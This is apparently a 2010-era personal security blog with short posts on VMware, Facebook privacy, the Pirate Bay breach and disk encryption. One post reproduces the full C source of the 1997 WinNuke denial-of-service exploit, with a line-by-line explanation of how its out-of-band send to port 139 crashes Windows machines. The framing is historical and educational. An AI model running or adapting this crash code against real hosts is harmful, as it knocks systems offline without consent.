Excellent work up of a facebook vulnerability

The inj3ct0r team did a real good job with this write up,

http://inj3ct0r.com/exploits/11638

In the next few days I will pull a few quotes out of it and try to expand a little more on whats going on.

Enjoy!

VMWare VM Redundancy

Have you ever had a VM that you needed to keep running if your SAN was not?

This problem came across my desk at one point and it took a bit of thinking but I think I got a pretty good solution figured out.

The ESXi host will be booting off a local disk, it will also have a local datastore.  The VM will have one 100GB disk on the local datastore and a second 100GB disk will be on the SAN.  Once the install of the VM is completed I setup a software mirror in the OS across the two datastores, so in the event of a failure of the SAN the VM will keep running, and if the host dies you are able to take the disk of the VM and assign it to another host and start it back up.

Do you really know your friends?

I have thought about this for many years with Facebook and LinkedIn.  How many of the people on your friend list have you actually checked to see that they are, who they say they are?

How many are old friends that you just added but did not really have a conversation with, or did have one that was common knowledge?

It does not take a whole lot of information to get your email password reset.  With the basic information from a facebook profile, you can start to collect the necessary information to gain access to email accounts.

Anything posted on the internet should be treated as such, you might as well write it on a billboard.

So someone tried the same thing with members of the DOD and other arms of the US gov, I don’t want to spoil this one, so head over and check it out.

http://www.darkreading.com/insiderthreat/security/privacy/showArticle.jhtml?articleID=225702468

thepiratebay.org

There appears to have been more then a few SQL injection vulnerabilities on thepiratebay.org,

http://krebsonsecurity.com/2010/07/pirate-bay-hack-exposes-user-booty/

The group responsible says that none of the information gained was sold or disseminated.  Still if you had an account there I would change your password and I hope that you have not been doing something that you should not have been.

Xen vs VMWare

This is a little older then I would like, but I have not been able to find anything else like this document.

www.vmware.com/pdf/hypervisor_performance.pdf

This is a Xen head-to-head with ESX 3.0.1, it compare performance in compiling and gzip just to name a few.

Very interesting, even if it is a little old.

Suricata 1.0 release

The 1.0 release of the Suricata IPS/IDS has been released, you can get it here.

http://www.openinfosecfoundation.org/index.php/download-suricata

An ounce of prevetion

It always pays to encrypt your disk.

http://www.theregister.co.uk/2010/06/28/brazil_banker_crypto_lock_out/

I don’t know if I would call him a smart criminal but at least it sounds like he out smarted the authorities and the FBI.

By the way he is using TrueCrypt, one of my favorites, it can be found at truecrypt.org.

winnuke.c

Ok here is the code that was at the like I posted previously ( it is posted at the bottom of this).

I am pretty sure this is the right code, line 1 has the author _eci. Wikipedia as an article on it and it lists the name person as the poster of the code.

I am still not an expert in c but I can read the code and point things of interest as we go and see if I can explain them a bit.

Lines 5-11 are includes that are pulling in the needed code that is needed. Some of the ones of note would be 8 and 10, netinet and socket.

13 is setting up the destination port, 139 in this case.

15 – 18 is the declaration of variables and structures.

21 is the start of sub called open_sock that is going to be making the connection out. ( If you are really interested in creating sockets there is great examples to be found on google.)

On line 59 you can see the call to the sub with some variables. open_sock(<the name of the socket>, <the target>, <the destination port>)

Line 62 is the attack, send(<the name of the socket>, <the message to send>, <the length of the message>, <additional flags>). The payload is “Bye”, but the message is irrelevant. The important part is the additional flags, MSG_OOB. MSG_OOB is the signal in the TCP header that this is out of band, and that is exactly what causes the system to blue screen.

Ta Da!

( it was here if you did not get it –> neil.franklin.ch/Info_Texts/winnuke.c )

1 /* winnuke.c - (05/07/97)  By _eci  */
2 /* Tested on Linux 2.0.30, SunOS 5.5.1, and BSDI 2.1 */
3
4
5 #include <stdio.h>
6 #include <string.h>
7 #include <netdb.h>
8 #include <netinet/in.h>
9 #include <sys/types.h>
10 #include <sys/socket.h>
11 #include <unistd.h>
12
13 #define dport 139  /* Attack port: 139 is what we want */
14
15 int x, s;
16 char *str = "Bye";  /* Makes no diff */
17 struct sockaddr_in addr, spoofedaddr;
18 struct hostent *host;
19
20
21 int open_sock(int sock, char *server, int port) {
22     struct sockaddr_in blah;
23     struct hostent *he;
24     bzero((char *)&blah,sizeof(blah));
25     blah.sin_family=AF_INET;
26     blah.sin_addr.s_addr=inet_addr(server);
27     blah.sin_port=htons(port);
28
29    if ((he = gethostbyname(server)) != NULL) {
30       bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
31    }
32    else {
33         if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) {
34           perror("gethostbyname()");
35           return(-3);
36         }
37    }
38
39        if (connect(sock,(struct sockaddr *)&blah,16)==-1) {
40             perror("connect()");
41             close(sock);
42             return(-4);
43        }
44        printf("Connected to [%s:%d].\n",server,port);
45        return;
46 }

47 void main(int argc, char *argv[]) {
48
49     if (argc != 2) {
50       printf("Usage: %s <target>\n",argv[0]);
51       exit(0);
52     }
53
54     if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
55        perror("socket()");
56        exit(-1);
57     }
58
59     open_sock(s,argv[1],dport);
60
61     printf("Sending crash... ");
62       send(s,str,strlen(str),MSG_OOB);
63       usleep(100000);
64     printf("Done!\n");
65     close(s);
66 }

A little more histroy

Do you remember your first WinNuke?

I sure do, in 1997 when the code for WinNuke was floating around a Netscape and very blinkie and animated gif Internet.  At the time I was spending way to much time playing Tie Fighter and War Craft I or II, but I did find some spare time to mess with the WinNuke code.

I wish I had kept the code for the one that I was messing with, I remember the setup of being able to enter a whole subnet and not just individual hosts. Times where good and exploit code was simple!

I did find a link to what looks like the original code.

neil.franklin.ch/Info_Texts/winnuke.c

I think this a great example to do a walk through, take a look at the posted code. Part 2 is going to have a detailed step through.

Nothing like watching a whole lab of computers all going blue

A little history

I was checking some of my favorite places to get new exploits for meatsploit and I stumbled on a posting of the hackers manifesto!

That sure makes me thing, I tend to forget when life was like even before I had a modem and we and to move data around using our sneaker net.  That’s when I found out that putting floppies in your pocket when its -40c outside does not really do much for you if you ever want to get that data back off!

It gets me all nostalgic thinking about the first BBS’s I started to use, and the games that were on there.  Man do I miss dialing up and playing LORD at 11:45 and then sitting on the line until 12 so I could get a second turn.

http://en.wikipedia.org/wiki/Hacker_Manifesto